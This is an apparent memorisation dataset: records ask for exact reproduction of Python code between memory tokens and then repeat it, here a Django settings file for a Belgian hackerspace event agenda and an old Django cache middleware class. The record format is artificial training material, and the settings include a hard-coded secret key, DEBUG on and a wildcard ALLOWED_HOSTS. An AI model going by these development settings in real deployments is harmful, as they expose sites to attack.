\"voidwarranties\",\n \"whitespace\",\n \"wolfplex\",\n \"ko_lab\"\n ],\n \"exclude_source\": [],\n \"tag\": [],\n \"exclude_tag\": [],\n}\n\nPREDEFINED_FILTERS[\"*lab\"] = {\n \"source\": [],\n \"exclude_source\": [],\n \"tag\": [\"fablab\"],\n \"exclude_tag\": [],\n}\n\nPREDEFINED_FILTERS[\"art\"] = {\n \"source\": [],\n \"exclude_source\": [],\n \"tag\": [\"art\"],\n \"exclude_tag\": [],\n}\n\nPREDEFINED_FILTERS[\"code\"] = {\n \"source\": [],\n \"exclude_source\": [],\n \"tag\": [\"code\"],\n \"exclude_tag\": [],\n}\n\nif DEBUG:\n MIDDLEWARE += (\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n # Needed for the admin interface\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n )\n\nINTERNAL_IPS = ('127.0.0.1',)\n\nROOT_URLCONF = 'hackeragenda.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'hackeragenda.wsgi.application'\n\nLEAFLET_CONFIG = {\n 'DEFAULT_CENTER': (50.6407351, 4.66696),\n 'DEFAULT_ZOOM': 7,\n 'MIN_ZOOM': 2,\n}\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'authentication',\n 'administration',\n 'events',\n 'taggit',\n 'gunicorn',\n 'leaflet',\n)\n\nAGENDA = \"be\"\n\nif DEBUG:\n INSTALLED_APPS += (\n 'debug_toolbar',\n 'django_pdb',\n 'django_extensions',\n )\n\nFIXTURE_DIRS = (\n 'fixtures',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\nSOUTH_MIGRATION_MODULES = {\n 'taggit': 'taggit.south_migrations',\n}\n\nLOGIN_REDIRECT_URL = '/administration/'\n\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n```\nCharacter-for-character where possible.",
"role": "user"
}
] |
[
{
"content": "Produce an exact reconstruction of the code:\n<|memory_start|>```python\n# Django settings for hackeragenda project.\n\nimport os\n\nfrom collections import OrderedDict\n\nPROJECT_PATH = os.path.abspath(os.path.split(__file__)[0])\nSUBPROJECT_PATH = os.path.split(PROJECT_PATH)[0]\n\nBASE_DIR = PROJECT_PATH # to avoid stupid warning from django 1.6\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n # ('Your Name', '[email protected]'),\n)\n\nALLOWED_HOSTS = ['*']\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'db.sqlite',\n }\n}\n\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\nTIME_ZONE = 'Europe/Brussels'\n\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = False\n\nMEDIA_ROOT = ''\nMEDIA_URL = '/medias/'\n\nSTATIC_ROOT = SUBPROJECT_PATH + '/static_deploy/static/'\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(SUBPROJECT_PATH, \"static\"),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\nSECRET_KEY = 't)^bq6!v8!vj$+t+!4x1+uj100d73_8pt5d1(gh=py=lz7$^vm'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(SUBPROJECT_PATH, \"templates\"),],\n # 'APP_DIRS': True,\n 'OPTIONS': {\n 'loaders': [\n 'hamlpy.template.loaders.HamlPyFilesystemLoader',\n 'hamlpy.template.loaders.HamlPyAppDirectoriesLoader',\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n ],\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nPREDEFINED_FILTERS = OrderedDict()\nPREDEFINED_FILTERS[\"default\"] = {\n \"source\": [\n 'afpyro',\n 'agenda_du_libre_be',\n 'belgian_blender_user_group',\n 'belgium_python_meetup',\n 'bhackspace',\n 'blender_brussels',\n 'brixel',\n 'bxlug',\n 'constantvzw',\n 'F_LAT',\n 'foam',\n 'hsbxl',\n 'incubhacker',\n 'jeudi_du_libre_mons',\n 'ko_lab',\n 'makilab',\n 'neutrinet',\n 'npbbxl',\n 'okfnbe',\n 'okno',\n 'opengarage',\n 'opengarage_meetings',\n 'openstreetmap_belgium',\n 'opentechschool',\n 'owaspbe',\n 'realize',\n 'source',\n 'syn2cat',\n 'urlab',\n 'voidwarranties',\n 'whitespace',\n 'wolfplex',\n ],\n \"exclude_source\": [],\n \"tag\": [],\n \"exclude_tag\": [\"meeting\", \"on_reservation\"],\n}\n\nPREDEFINED_FILTERS[\"all\"] = {\n \"source\": [],\n \"exclude_source\": [],\n \"tag\": [],\n \"exclude_tag\": [],\n}\n\nPREDEFINED_FILTERS[\"hackerspaces\"] = {\n \"source\": [\n \"brixel\",\n \"bhackspace\",\n \"hsbxl\",\n \"incubhacker\",\n \"opengarage\",\n \"syn2cat\",\n \"urlab\",\n \"voidwarranties\",\n \"whitespace\",\n \"wolfplex\",\n \"ko_lab\"\n ],\n \"exclude_source\": [],\n \"tag\": [],\n \"exclude_tag\": [],\n}\n\nPREDEFINED_FILTERS[\"*lab\"] = {\n \"source\": [],\n \"exclude_source\": [],\n \"tag\": [\"fablab\"],\n \"exclude_tag\": [],\n}\n\nPREDEFINED_FILTERS[\"art\"] = {\n \"source\": [],\n \"exclude_source\": [],\n \"tag\": [\"art\"],\n \"exclude_tag\": [],\n}\n\nPREDEFINED_FILTERS[\"code\"] = {\n \"source\": [],\n \"exclude_source\": [],\n \"tag\": [\"code\"],\n \"exclude_tag\": [],\n}\n\nif DEBUG:\n MIDDLEWARE += (\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n # Needed for the admin interface\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n )\n\nINTERNAL_IPS = ('127.0.0.1',)\n\nROOT_URLCONF = 'hackeragenda.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'hackeragenda.wsgi.application'\n\nLEAFLET_CONFIG = {\n 'DEFAULT_CENTER': (50.6407351, 4.66696),\n 'DEFAULT_ZOOM': 7,\n 'MIN_ZOOM': 2,\n}\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'authentication',\n 'administration',\n 'events',\n 'taggit',\n 'gunicorn',\n 'leaflet',\n)\n\nAGENDA = \"be\"\n\nif DEBUG:\n INSTALLED_APPS += (\n 'debug_toolbar',\n 'django_pdb',\n 'django_extensions',\n )\n\nFIXTURE_DIRS = (\n 'fixtures',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\nSOUTH_MIGRATION_MODULES = {\n 'taggit': 'taggit.south_migrations',\n}\n\nLOGIN_REDIRECT_URL = '/administration/'\n\ntry:\n from settings_local import *\nexcept ImportError:\n pass\n```<|memory_end|>\nCharacter-for-character where possible.",
"role": "user"
}
] |
```python
# Django settings for hackeragenda project.
import os
from collections import OrderedDict
PROJECT_PATH = os.path.abspath(os.path.split(__file__)[0])
SUBPROJECT_PATH = os.path.split(PROJECT_PATH)[0]
BASE_DIR = PROJECT_PATH # to avoid stupid warning from django 1.6
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
ALLOWED_HOSTS = ['*']
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'db.sqlite',
}
}
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
TIME_ZONE = 'Europe/Brussels'
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
USE_I18N = True
USE_L10N = True
USE_TZ = False
MEDIA_ROOT = ''
MEDIA_URL = '/medias/'
STATIC_ROOT = SUBPROJECT_PATH + '/static_deploy/static/'
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(SUBPROJECT_PATH, "static"),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
SECRET_KEY = 't)^bq6!v8!vj$+t+!4x1+uj100d73_8pt5d1(gh=py=lz7$^vm'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(SUBPROJECT_PATH, "templates"),],
# 'APP_DIRS': True,
'OPTIONS': {
'loaders': [
'hamlpy.template.loaders.HamlPyFilesystemLoader',
'hamlpy.template.loaders.HamlPyAppDirectoriesLoader',
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
PREDEFINED_FILTERS = OrderedDict()
PREDEFINED_FILTERS["default"] = {
"source": [
'afpyro',
'agenda_du_libre_be',
'belgian_blender_user_group',
'belgium_python_meetup',
'bhackspace',
'blender_brussels',
'brixel',
'bxlug',
'constantvzw',
'F_LAT',
'foam',
'hsbxl',
'incubhacker',
'jeudi_du_libre_mons',
'ko_lab',
'makilab',
'neutrinet',
'npbbxl',
'okfnbe',
'okno',
'opengarage',
'opengarage_meetings',
'openstreetmap_belgium',
'opentechschool',
'owaspbe',
'realize',
'source',
'syn2cat',
'urlab',
'voidwarranties',
'whitespace',
'wolfplex',
],
"exclude_source": [],
"tag": [],
"exclude_tag": ["meeting", "on_reservation"],
}
PREDEFINED_FILTERS["all"] = {
"source": [],
"exclude_source": [],
"tag": [],
"exclude_tag": [],
}
PREDEFINED_FILTERS["hackerspaces"] = {
"source": [
"brixel",
"bhackspace",
"hsbxl",
"incubhacker",
"opengarage",
"syn2cat",
"urlab",
"voidwarranties",
"whitespace",
"wolfplex",
"ko_lab"
],
"exclude_source": [],
"tag": [],
"exclude_tag": [],
}
PREDEFINED_FILTERS["*lab"] = {
"source": [],
"exclude_source": [],
"tag": ["fablab"],
"exclude_tag": [],
}
PREDEFINED_FILTERS["art"] = {
"source": [],
"exclude_source": [],
"tag": ["art"],
"exclude_tag": [],
}
PREDEFINED_FILTERS["code"] = {
"source": [],
"exclude_source": [],
"tag": ["code"],
"exclude_tag": [],
}
if DEBUG:
MIDDLEWARE += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
# Needed for the admin interface
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
)
INTERNAL_IPS = ('127.0.0.1',)
ROOT_URLCONF = 'hackeragenda.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'hackeragenda.wsgi.application'
LEAFLET_CONFIG = {
'DEFAULT_CENTER': (50.6407351, 4.66696),
'DEFAULT_ZOOM': 7,
'MIN_ZOOM': 2,
}
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'authentication',
'administration',
'events',
'taggit',
'gunicorn',
'leaflet',
)
AGENDA = "be"
if DEBUG:
INSTALLED_APPS += (
'debug_toolbar',
'django_pdb',
'django_extensions',
)
FIXTURE_DIRS = (
'fixtures',
)
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
SOUTH_MIGRATION_MODULES = {
'taggit': 'taggit.south_migrations',
}
LOGIN_REDIRECT_URL = '/administration/'
try:
from settings_local import *
except ImportError:
pass
```
|
[
{
"content": "```python\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.utils.cache import get_cache_key, learn_cache_key, patch_response_headers\n\nclass CacheMiddleware(object):\n \"\"\"\n Cache middleware. If this is enabled, each Django-powered page will be\n cached for CACHE_MIDDLEWARE_SECONDS seconds. Cache is based on URLs.\n\n Only parameter-less GET or HEAD-requests with status code 200 are cached.\n\n If CACHE_MIDDLEWARE_ANONYMOUS_ONLY is set to True, only anonymous requests\n (i.e., those not made by a logged-in user) will be cached. This is a\n simple and effective way of avoiding the caching of the Django admin (and\n any other user-specific content).\n\n This middleware expects that a HEAD request is answered with a response\n exactly like the corresponding GET request.\n\n When a hit occurs, a shallow copy of the original response object is\n returned from process_request.\n\n Pages will be cached based on the contents of the request headers\n listed in the response's \"Vary\" header. This means that pages shouldn't\n change their \"Vary\" header.\n\n This middleware also sets ETag, Last-Modified, Expires and Cache-Control\n headers on the response object.\n \"\"\"\n def __init__(self, cache_timeout=None, key_prefix=None, cache_anonymous_only=None):\n self.cache_timeout = cache_timeout\n if cache_timeout is None:\n self.cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS\n self.key_prefix = key_prefix\n if key_prefix is None:\n self.key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX\n if cache_anonymous_only is None:\n self.cache_anonymous_only = getattr(settings, 'CACHE_MIDDLEWARE_ANONYMOUS_ONLY', False)\n else:\n self.cache_anonymous_only = cache_anonymous_only\n\n def process_request(self, request):\n \"Checks whether the page is already cached and returns the cached version if available.\"\n if self.cache_anonymous_only:\n assert hasattr(request, 'user'), \"The Django cache middleware with CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True requires authentication middleware to be installed. Edit your MIDDLEWARE_CLASSES setting to insert 'django.contrib.auth.middleware.AuthenticationMiddleware' before the CacheMiddleware.\"\n\n if not request.method in ('GET', 'HEAD') or request.GET:\n request._cache_update_cache = False\n return None # Don't bother checking the cache.\n\n if self.cache_anonymous_only and request.user.is_authenticated():\n request._cache_update_cache = False\n return None # Don't cache requests from authenticated users.\n\n cache_key = get_cache_key(request, self.key_prefix)\n if cache_key is None:\n request._cache_update_cache = True\n return None # No cache information available, need to rebuild.\n\n response = cache.get(cache_key, None)\n if response is None:\n request._cache_update_cache = True\n return None # No cache information available, need to rebuild.\n\n request._cache_update_cache = False\n return response\n\n def process_response(self, request, response):\n \"Sets the cache, if needed.\"\n if not hasattr(request, '_cache_update_cache') or not request._cache_update_cache:\n # We don't need to update the cache, just return.\n return response\n if request.method != 'GET':\n # This is a stronger requirement than above. It is needed\n # because of interactions between this middleware and the\n # HTTPMiddleware, which throws the body of a HEAD-request\n # away before this middleware gets a chance to cache it.\n return response\n if not response.status_code == 200:\n return response\n patch_response_headers(response, self.cache_timeout)\n cache_key = learn_cache_key(request, response, self.cache_timeout, self.key_prefix)\n cache.set(cache_key, response, self.cache_timeout)\n return response\n```\nProvide the complete code exactly.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.utils.cache import get_cache_key, learn_cache_key, patch_response_headers\n\nclass CacheMiddleware(object):\n \"\"\"\n Cache middleware. If this is enabled, each Django-powered page will be\n cached for CACHE_MIDDLEWARE_SECONDS seconds. Cache is based on URLs.\n\n Only parameter-less GET or HEAD-requests with status code 200 are cached.\n\n If CACHE_MIDDLEWARE_ANONYMOUS_ONLY is set to True, only anonymous requests\n (i.e., those not made by a logged-in user) will be cached. This is a\n simple and effective way of avoiding the caching of the Django admin (and\n any other user-specific content).\n\n This middleware expects that a HEAD request is answered with a response\n exactly like the corresponding GET request.\n\n When a hit occurs, a shallow copy of the original response object is\n returned from process_request.\n\n Pages will be cached based on the contents of the request headers\n listed in the response's \"Vary\" header. This means that pages shouldn't\n change their \"Vary\" header.\n\n This middleware also sets ETag, Last-Modified, Expires and Cache-Control\n headers on the response object.\n \"\"\"\n def __init__(self, cache_timeout=None, key_prefix=None, cache_anonymous_only=None):\n self.cache_timeout = cache_timeout\n if cache_timeout is None:\n self.cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS\n self.key_prefix = key_prefix\n if key_prefix is None:\n self.key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX\n if cache_anonymous_only is None:\n self.cache_anonymous_only = getattr(settings, 'CACHE_MIDDLEWARE_ANONYMOUS_ONLY', False)\n else:\n self.cache_anonymous_only = cache_anonymous_only\n\n def process_request(self, request):\n \"Checks whether the page is already cached and returns the cached version if available.\"\n if self.cache_anonymous_only:\n assert hasattr(request, 'user'), \"The Django cache middleware with CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True requires authentication middleware to be installed. Edit your MIDDLEWARE_CLASSES setting to insert 'django.contrib.auth.middleware.AuthenticationMiddleware' before the CacheMiddleware.\"\n\n if not request.method in ('GET', 'HEAD') or request.GET:\n request._cache_update_cache = False\n return None # Don't bother checking the cache.\n\n if self.cache_anonymous_only and request.user.is_authenticated():\n request._cache_update_cache = False\n return None # Don't cache requests from authenticated users.\n\n cache_key = get_cache_key(request, self.key_prefix)\n if cache_key is None:\n request._cache_update_cache = True\n return None # No cache information available, need to rebuild.\n\n response = cache.get(cache_key, None)\n if response is None:\n request._cache_update_cache = True\n return None # No cache information available, need to rebuild.\n\n request._cache_update_cache = False\n return response\n\n def process_response(self, request, response):\n \"Sets the cache, if needed.\"\n if not hasattr(request, '_cache_update_cache') or not request._cache_update_cache:\n # We don't need to update the cache, just return.\n return response\n if request.method != 'GET':\n # This is a stronger requirement than above. It is needed\n # because of interactions between this middleware and the\n # HTTPMiddleware, which throws the body of a HEAD-request\n # away before this middleware gets a chance to cache it.\n return response\n if not response.status_code == 200:\n return response\n patch_response_headers(response, self.cache_timeout)\n cache_key = learn_cache_key(request, response, self.cache_timeout, self.key_prefix)\n cache.set(cache_key, response, self.cache_timeout)\n return response\n```<|memory_end|>\nProvide the complete code exactly.",
"role": "user"
}
] |
```python
from django.conf import settings
from django.core.cache import cache
from django.utils.cache import get_cache_key, learn_cache_key, patch_response_headers
class CacheMiddleware(object):
"""
Cache middleware. If this is enabled, each Django-powered page will be
cached for CACHE_MIDDLEWARE_SECONDS seconds. Cache is based on URLs.
Only parameter-less GET or HEAD-requests with status code 200 are cached.
If CACHE_MIDDLEWARE_ANONYMOUS_ONLY is set to True, only anonymous requests
(i.e., those not made by a logged-in user) will be cached. This is a
simple and effective way of avoiding the caching of the Django admin (and
any other user-specific content).
This middleware expects that a HEAD request is answered with a response
exactly like the corresponding GET request.
When a hit occurs, a shallow copy of the original response object is
returned from process_request.
Pages will be cached based on the contents of the request headers
listed in the response's "Vary" header. This means that pages shouldn't
change their "Vary" header.
This middleware also sets ETag, Last-Modified, Expires and Cache-Control
headers on the response object.
"""
def __init__(self, cache_timeout=None, key_prefix=None, cache_anonymous_only=None):
self.cache_timeout = cache_timeout
if cache_timeout is None:
self.cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
self.key_prefix = key_prefix
if key_prefix is None:
self.key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
if cache_anonymous_only is None:
self.cache_anonymous_only = getattr(settings, 'CACHE_MIDDLEWARE_ANONYMOUS_ONLY', False)
else:
self.cache_anonymous_only = cache_anonymous_only
def process_request(self, request):
"Checks whether the page is already cached and returns the cached version if available."
if self.cache_anonymous_only:
assert hasattr(request, 'user'), "The Django cache middleware with CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True requires authentication middleware to be installed. Edit your MIDDLEWARE_CLASSES setting to insert 'django.contrib.auth.middleware.AuthenticationMiddleware' before the CacheMiddleware."
if not request.method in ('GET', 'HEAD') or request.GET:
request._cache_update_cache = False
return None # Don't bother checking the cache.
if self.cache_anonymous_only and request.user.is_authenticated():
request._cache_update_cache = False
return None # Don't cache requests from authenticated users.
cache_key = get_cache_key(request, self.key_prefix)
if cache_key is None:
request._cache_update_cache = True
return None # No cache information available, need to rebuild.
response = cache.get(cache_key, None)
if response is None:
request._cache_update_cache = True
return None # No cache information available, need to rebuild.
request._cache_update_cache = False
return response
def process_response(self, request, response):
"Sets the cache, if needed."
if not hasattr(request, '_cache_update_cache') or not request._cache_update_cache:
# We don't need to update the cache, just return.
return response
if request.method != 'GET':
# This is a stronger requirement than above. It is needed
# because of interactions between this middleware and the
# HTTPMiddleware, which throws the body of a HEAD-request
# away before this middleware gets a chance to cache it.
return response
if not response.status_code == 200:
return response
patch_response_headers(response, self.cache_timeout)
cache_key = learn_cache_key(request, response, self.cache_timeout, self.key_prefix)
cache.set(cache_key, response, self.cache_timeout)
return response
```
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.